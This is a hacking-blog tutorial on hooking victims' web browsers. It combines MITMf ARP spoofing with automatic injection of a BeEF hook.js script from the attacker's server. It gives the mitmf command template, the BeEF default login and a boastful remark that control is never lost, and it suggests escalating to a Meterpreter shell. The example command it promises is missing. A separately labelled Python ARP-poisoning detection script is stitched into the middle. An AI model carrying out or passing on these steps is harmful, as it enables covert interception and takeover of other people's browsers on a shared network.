How to Hook Web Browsers with MITMf and BeEF

Jun 22, 2015 04:11 AM
Jul 26, 2015 07:04 AM
Do you remember the last time we used BeEF? Well, now we get to use it again, but this time with MITMf! We are going to auto-inject the hooking script into every webpage the victim visits!

Requirements

If you don't already have it, install MITMf via apt-get install mitmf. You might want to apt-get update first. If you want to, you can clone it from the Git repository (git clone https://github.com/byt3bl33d3r/MITMf), but I've had trouble with that version.

BeEF should already be installed in Kali/Back|Track.

Step 1: Start BeEF

Open a new terminal and type cd /usr/share/beef-xss/.

As you can see, we have BeEF installed, and we can go ahead and run it by typing ./beef. You should get this output:

Do you see the Hook URL? That's important. Remember or copy the URL provided.

Step 2: Open the Panel

Now you can open the BeEF web panel with the UI URL. Once presented with the login page, you should just be able to get in with the default credentials "beef" for both the username and password. Once inside the UI, you should have this screen:

Step 3: Inject the Hook.js Script

Open up a new terminal. We'll be using MITMf to inject the hooking script. Use mitmf --spoof --arp -i <interface> --gateway <gateway IP> --target <target IP> --inject --js-url <hook URL> as the format.

  • --spoof loads the spoof plugin
  • --arp redirects traffic using ARP spoofing
  • -i specifies the interface to inject packets on
  • --gateway sets the IP of your router to redirect through
  • --target sets the target IP to inject the hook.js script
  • --inject loads the inject function
  • --js-url specifies the URL of the JavaScript to inject

For instance, I use this command:

Run the command and MITMf should start giving you some output.

MITMf is telling us that it has successfully injected the hook.js script into the websites that the target visited.
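Seen from the target's side, the --spoof --arp step in Step 3 leaves a recognizable trace: the gateway's IP resolves to a MAC address that is not the router's. The following is an added detection example, not part of the original post; the `ip neigh show` sample, the addresses and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed `ip neigh show` output from a host whose ARP cache is poisoned:
# the gateway 192.168.1.1 and host 192.168.1.66 resolve to the same MAC.
SAMPLE_NEIGH = """\
192.168.1.1 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.1.66 dev eth0 lladdr 08:00:27:AA:BB:CC STALE
192.168.1.20 dev eth0 lladdr 52:54:00:12:34:56 REACHABLE
192.168.1.99 dev eth0  FAILED
fe80::1 dev eth0 lladdr 52:54:00:99:88:77 router STALE
"""

ENTRY = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\b")

def parse_neigh(text):
    """Map IPv4 address -> (device, lowercase MAC) for resolved entries."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.match(line.strip())
        if m and ":" not in m.group(1):  # skip FAILED/INCOMPLETE and IPv6 rows
            table[m.group(1)] = (m.group(2), m.group(3).lower())
    return table

def arp_findings(text, gateway_ip, known_gateway_mac=None):
    """Return a sorted list of (finding, mac, ips) tuples."""
    table = parse_neigh(text)
    findings = []
    # Check 1: gateway MAC differs from a baseline recorded earlier (assumed input).
    if known_gateway_mac and gateway_ip in table:
        mac = table[gateway_ip][1]
        if mac != known_gateway_mac.lower():
            findings.append(("gateway-mac-changed", mac, [gateway_ip]))
    # Check 2: one MAC answering for several IPs on the same interface.
    by_mac = defaultdict(list)
    for ip, key in table.items():
        by_mac[key].append(ip)
    for (_dev, mac), ips in by_mac.items():
        if len(ips) > 1:
            kind = "gateway-shares-mac" if gateway_ip in ips else "shared-mac"
            findings.append((kind, mac, sorted(ips)))
    return sorted(findings)

if __name__ == "__main__":
    for kind, mac, ips in arp_findings(SAMPLE_NEIGH, "192.168.1.1", "52:54:00:00:00:01"):
        print(f"{kind}: {mac} <- {', '.join(ips)}")
```

A plain "shared-mac" finding can be legitimate (a multihomed host or a router with secondary addresses), so treat it as a prompt to review. The baseline comparison still fires when the spoofing machine's own IP never appears in the table.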

Step 4: Back to BeEF

If we check our BeEF panel, we will see the hooked computer right on the Online Browsers tab.

Remember in my previous XSS posts where I said the victim must stay on the webpage for you to have control of it? Guess what? You don't have to worry about that now! MITMf will continue injecting the script into every website the victim visits, so you'll never lose control!

Conclusion

Now we know what power lies within MITMf... we can do so much more. From there, you can continue trying to exploit the victim machine, and maybe get a Meterpreter prompt! Ah, the joy of MitM attacks...

NOTE: This only works with non-HSTS websites. You could try the --hsts function, but it might make things too slow and/or glitchy.

C|H of C3
